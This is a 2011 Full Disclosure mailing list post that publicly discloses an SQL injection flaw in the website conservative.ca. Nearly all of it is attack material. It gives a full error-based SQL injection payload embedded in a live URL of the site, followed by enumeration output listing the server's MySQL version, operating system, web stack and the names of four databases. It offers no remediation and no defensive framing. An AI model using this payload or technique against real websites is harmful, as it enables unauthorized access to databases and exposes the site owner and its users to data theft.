|
Full Disclosure
mailing list archives
conservative.ca SQL Injection
From: m4l1c3 <malice.anon () gmail com>
Date: Sun, 1 May 2011 13:49:43 -0400
http://www.conservative.ca/index.php?section_copy_id=21257�ion_i' AND
(SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT
(CASE WHEN (3997=3997) THEN 1 ELSE 0
END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN
DBMS is MySQL 5.0
running Linux CentOS 5,Apache 2.2.3, PHP 5.2.12
available databases [4]:
[*] conservativ_ca_v1_6_store_v1_0
[*] conservativ_ca_v1_81
[*] information_schema
[*] test
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- conservative.ca SQL Injection m4l1c3 (May 02)
|
